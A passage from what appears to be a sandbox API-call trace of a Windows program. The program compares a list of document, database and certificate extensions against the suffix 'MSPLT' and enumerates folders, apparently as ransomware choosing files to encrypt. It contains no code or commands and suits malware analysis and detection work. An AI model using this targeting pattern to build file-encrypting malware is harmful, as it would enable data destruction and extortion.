-1 [0169.768] lstrlenW (lpString=".f4v") returned 4 [0169.768] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".fido") returned 5 [0169.768] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0169.768] lstrlenW (lpString=".flm") returned 4 [0169.768] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".flv") returned 4 [0169.768] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".frm") returned 4 [0169.768] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".fxg") returned 4 [0169.768] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".geo") returned 4 [0169.768] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".gif") returned 4 [0169.768] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".grs") returned 4 [0169.768] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0169.768] lstrlenW (lpString=".gz") returned 3 [0169.769] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0169.769] lstrlenW (lpString=".h") returned 2 [0169.769] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0169.769] lstrlenW (lpString=".hdr") returned 4 [0169.769] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".hpp") returned 4 [0169.769] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".hta") returned 4 [0169.769] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".htc") returned 4 [0169.769] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".htm") returned 4 [0169.769] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".html") returned 5 [0169.769] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0169.769] lstrlenW (lpString=".icb") returned 4 [0169.769] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".ics") returned 4 [0169.769] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".iff") returned 4 [0169.769] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".inc") returned 4 [0169.769] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".indd") returned 5 [0169.769] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0169.769] lstrlenW (lpString=".ini") returned 4 [0169.769] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".iqy") returned 4 [0169.769] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".j2c") returned 4 [0169.769] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".j2k") returned 4 [0169.769] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0169.769] lstrlenW (lpString=".java") returned 5 [0169.770] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0169.770] lstrlenW (lpString=".jp2") returned 4 [0169.770] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0169.770] lstrlenW (lpString=".jpc") returned 4 [0169.770] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0169.770] lstrlenW (lpString=".jpe") returned 4 [0169.770] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0169.770] lstrlenW (lpString=".jpeg") returned 5 [0169.770] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0169.770] lstrlenW (lpString=".jpf") returned 4 [0169.770] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0169.770] lstrlenW (lpString=".jpg") returned 4 [0169.770] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0169.770] lstrlenW (lpString=".jpx") returned 4 [0169.770] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0169.770] lstrlenW (lpString=".js") returned 3 [0169.770] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0169.770] lstrlenW (lpString=".jsf") returned 4 [0169.770] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0169.770] lstrlenW (lpString=".json") returned 5 [0169.770] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0169.770] lstrlenW (lpString=".jsp") returned 4 [0169.770] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0169.770] lstrlenW (lpString=".kdc") returned 4 [0169.770] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0169.770] lstrlenW (lpString=".kmz") returned 4 [0169.770] lstrcmpiW (lpString1=".kmz", lpString2="SPLT") returned -1 [0169.770] lstrlenW (lpString=".kwm") returned 4 [0169.770] lstrcmpiW (lpString1=".kwm", lpString2="SPLT") returned -1 [0169.770] lstrlenW (lpString=".lasso") returned 6 [0169.770] lstrcmpiW (lpString1=".lasso", lpString2=".MSPLT") returned -1 [0169.770] lstrlenW (lpString=".lbi") returned 4 [0169.770] lstrcmpiW (lpString1=".lbi", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".lgf") returned 4 [0169.771] lstrcmpiW (lpString1=".lgf", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".lgp") returned 4 [0169.771] lstrcmpiW (lpString1=".lgp", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".log") returned 4 [0169.771] lstrcmpiW (lpString1=".log", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".m1v") returned 4 [0169.771] lstrcmpiW (lpString1=".m1v", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".m4a") returned 4 [0169.771] lstrcmpiW (lpString1=".m4a", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".m4v") returned 4 [0169.771] lstrcmpiW (lpString1=".m4v", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".max") returned 4 [0169.771] lstrcmpiW (lpString1=".max", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".md") returned 3 [0169.771] lstrcmpiW (lpString1=".md", lpString2="PLT") returned -1 [0169.771] lstrlenW (lpString=".mda") returned 4 [0169.771] lstrcmpiW (lpString1=".mda", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".mdb") returned 4 [0169.771] lstrcmpiW (lpString1=".mdb", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".mde") returned 4 [0169.771] lstrcmpiW (lpString1=".mde", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".mdf") returned 4 [0169.771] lstrcmpiW (lpString1=".mdf", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".mdw") returned 4 [0169.771] lstrcmpiW (lpString1=".mdw", lpString2="SPLT") returned -1 [0169.771] lstrlenW (lpString=".mef") returned 4 [0169.771] lstrcmpiW (lpString1=".mef", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mft") returned 4 [0169.772] lstrcmpiW (lpString1=".mft", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mfw") returned 4 [0169.772] lstrcmpiW (lpString1=".mfw", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mht") returned 4 [0169.772] lstrcmpiW (lpString1=".mht", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mhtml") returned 6 [0169.772] lstrcmpiW (lpString1=".mhtml", lpString2=".MSPLT") returned -1 [0169.772] lstrlenW (lpString=".mka") returned 4 [0169.772] lstrcmpiW (lpString1=".mka", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mkidx") returned 6 [0169.772] lstrcmpiW (lpString1=".mkidx", lpString2=".MSPLT") returned -1 [0169.772] lstrlenW (lpString=".mkv") returned 4 [0169.772] lstrcmpiW (lpString1=".mkv", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mos") returned 4 [0169.772] lstrcmpiW (lpString1=".mos", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mov") returned 4 [0169.772] lstrcmpiW (lpString1=".mov", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mp3") returned 4 [0169.772] lstrcmpiW (lpString1=".mp3", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mp4") returned 4 [0169.772] lstrcmpiW (lpString1=".mp4", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mpeg") returned 5 [0169.772] lstrcmpiW (lpString1=".mpeg", lpString2="MSPLT") returned -1 [0169.772] lstrlenW (lpString=".mpg") returned 4 [0169.772] lstrcmpiW (lpString1=".mpg", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mpv") returned 4 [0169.772] lstrcmpiW (lpString1=".mpv", lpString2="SPLT") returned -1 [0169.772] lstrlenW (lpString=".mrw") returned 4 [0169.772] lstrcmpiW (lpString1=".mrw", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".msg") returned 4 [0169.773] lstrcmpiW (lpString1=".msg", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".mxl") returned 4 [0169.773] lstrcmpiW (lpString1=".mxl", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".myd") returned 4 [0169.773] lstrcmpiW (lpString1=".myd", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".myi") returned 4 [0169.773] lstrcmpiW (lpString1=".myi", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".nef") returned 4 [0169.773] lstrcmpiW (lpString1=".nef", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".nrw") returned 4 [0169.773] lstrcmpiW (lpString1=".nrw", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".obj") returned 4 [0169.773] lstrcmpiW (lpString1=".obj", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".odb") returned 4 [0169.773] lstrcmpiW (lpString1=".odb", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".odc") returned 4 [0169.773] lstrcmpiW (lpString1=".odc", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".odm") returned 4 [0169.773] lstrcmpiW (lpString1=".odm", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".odp") returned 4 [0169.773] lstrcmpiW (lpString1=".odp", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".ods") returned 4 [0169.773] lstrcmpiW (lpString1=".ods", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".oft") returned 4 [0169.773] lstrcmpiW (lpString1=".oft", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".one") returned 4 [0169.773] lstrcmpiW (lpString1=".one", lpString2="SPLT") returned -1 [0169.773] lstrlenW (lpString=".onepkg") returned 7 [0169.773] lstrcmpiW (lpString1=".onepkg", lpString2="].MSPLT") returned -1 [0169.773] lstrlenW (lpString=".onetoc2") returned 8 [0169.773] lstrcmpiW (lpString1=".onetoc2", lpString2="m].MSPLT") returned -1 [0169.773] lstrlenW (lpString=".opt") returned 4 [0169.773] lstrcmpiW (lpString1=".opt", lpString2="SPLT") returned -1 [0169.774] lstrlenW (lpString=".oqy") returned 4 [0169.774] lstrcmpiW (lpString1=".oqy", lpString2="SPLT") returned -1 [0169.774] lstrlenW (lpString=".orf") returned 4 [0169.774] lstrcmpiW (lpString1=".orf", lpString2="SPLT") returned -1 [0169.774] lstrlenW (lpString=".p12") returned 4 [0169.774] lstrcmpiW (lpString1=".p12", lpString2="SPLT") returned -1 [0169.815] lstrlenW (lpString=".p7b") returned 4 [0169.815] lstrcmpiW (lpString1=".p7b", lpString2="SPLT") returned -1 [0169.815] lstrlenW (lpString=".p7c") returned 4 [0169.815] lstrcmpiW (lpString1=".p7c", lpString2="SPLT") returned -1 [0169.815] lstrlenW (lpString=".pam") returned 4 [0169.815] lstrcmpiW (lpString1=".pam", lpString2="SPLT") returned -1 [0169.815] lstrlenW (lpString=".pbm") returned 4 [0169.815] lstrcmpiW (lpString1=".pbm", lpString2="SPLT") returned -1 [0169.815] lstrlenW (lpString=".pct") returned 4 [0169.815] lstrcmpiW (lpString1=".pct", lpString2="SPLT") returned -1 [0169.815] lstrlenW (lpString=".pcx") returned 4 [0169.815] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0169.816] lstrlenW (lpString=".pdd") returned 4 [0169.816] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0169.816] lstrlenW (lpString=".pdf") returned 4 [0169.816] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0169.816] lstrlenW (lpString=".pdp") returned 4 [0169.816] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0169.816] lstrlenW (lpString=".pef") returned 4 [0169.816] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0169.816] lstrlenW (lpString=".pem") returned 4 [0169.816] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0169.816] lstrlenW (lpString=".pff") returned 4 [0169.816] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0169.816] lstrlenW (lpString=".pfm") returned 4 [0169.816] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0169.816] lstrlenW (lpString=".pfx") returned 4 [0169.816] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0169.816] lstrlenW (lpString=".pgm") returned 4 [0169.816] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0169.816] lstrlenW (lpString=".php") returned 4 [0169.816] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0169.816] lstrlenW (lpString=".php3") returned 5 [0169.816] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0169.816] lstrlenW (lpString=".php4") returned 5 [0169.816] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0169.816] lstrlenW (lpString=".php5") returned 5 [0169.816] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0169.816] lstrlenW (lpString=".phtml") returned 6 [0169.817] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0169.817] lstrlenW (lpString=".pict") returned 5 [0169.817] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0169.817] lstrlenW (lpString=".pl") returned 3 [0169.817] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0169.817] lstrlenW (lpString=".pls") returned 4 [0169.817] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0169.817] lstrlenW (lpString=".pm") returned 3 [0169.817] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0169.817] lstrlenW (lpString=".png") returned 4 [0169.817] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0169.817] lstrlenW (lpString=".pnm") returned 4 [0169.817] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0169.817] lstrlenW (lpString=".pot") returned 4 [0169.817] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0169.817] lstrlenW (lpString=".potm") returned 5 [0169.817] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0169.817] lstrlenW (lpString=".potx") returned 5 [0169.817] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0169.817] lstrlenW (lpString=".ppa") returned 4 [0169.817] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0169.817] lstrlenW (lpString=".ppam") returned 5 [0169.817] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0169.817] lstrlenW (lpString=".ppm") returned 4 [0169.817] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0169.817] lstrlenW (lpString=".pps") returned 4 [0169.817] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0169.818] lstrlenW (lpString=".ppsm") returned 5 [0169.818] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0169.818] lstrlenW (lpString=".ppt") returned 4 [0169.818] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0169.818] lstrlenW (lpString=".pptm") returned 5 [0169.818] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0169.818] lstrlenW (lpString=".pptx") returned 5 [0169.818] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0169.818] lstrlenW (lpString=".prn") returned 4 [0169.818] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0169.818] lstrlenW (lpString=".ps") returned 3 [0169.818] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0169.818] lstrlenW (lpString=".psb") returned 4 [0169.818] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0169.818] lstrlenW (lpString=".psd") returned 4 [0169.818] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0169.818] lstrlenW (lpString=".pst") returned 4 [0169.818] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0169.820] lstrlenW (lpString=".ptx") returned 4 [0169.820] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0169.820] lstrlenW (lpString=".pub") returned 4 [0169.820] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0169.820] lstrlenW (lpString=".pwm") returned 4 [0169.820] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0169.820] lstrlenW (lpString=".pxr") returned 4 [0169.820] lstrcmpiW (lpString1=".pxr", lpString2="SPLT") returned -1 [0169.820] lstrlenW (lpString=".py") returned 3 [0169.820] lstrcmpiW (lpString1=".py", lpString2="PLT") returned -1 [0169.820] lstrlenW (lpString=".qt") returned 3 [0169.820] lstrcmpiW (lpString1=".qt", lpString2="PLT") returned -1 [0169.820] lstrlenW (lpString=".r3d") returned 4 [0169.820] lstrcmpiW (lpString1=".r3d", lpString2="SPLT") returned -1 [0169.820] lstrlenW (lpString=".raf") returned 4 [0169.820] lstrcmpiW (lpString1=".raf", lpString2="SPLT") returned -1 [0169.820] lstrlenW (lpString=".rar") returned 4 [0169.820] lstrcmpiW (lpString1=".rar", lpString2="SPLT") returned -1 [0169.821] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0169.821] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf378ed8a, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1033", cAlternateFileName="")) returned 1 [0169.822] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0169.822] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1035", cAlternateFileName="")) returned 1 [0169.906] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0169.906] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf37db23a, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1036", cAlternateFileName="")) returned 1 [0169.906] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0169.906] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1037", cAlternateFileName="")) returned 1 [0171.340] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.365] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1038", cAlternateFileName="")) returned 1 [0171.366] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.366] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1040", cAlternateFileName="")) returned 1 [0171.366] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.366] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1041", cAlternateFileName="")) returned 1 [0171.366] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.366] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1042", cAlternateFileName="")) returned 1 [0171.366] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.366] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1043", cAlternateFileName="")) returned 1 [0171.367] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.367] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1044", cAlternateFileName="")) returned 1 [0171.367] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.367] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1045", cAlternateFileName="")) returned 1 [0171.367] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.367] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1046", cAlternateFileName="")) returned 1 [0171.367] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.367] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1049", cAlternateFileName="")) returned 1 [0171.368] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.368] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="1053", cAlternateFileName="")) returned 1 [0171.368] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0171.368] FindNextFileW (in: hFindFile=0x802398, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, 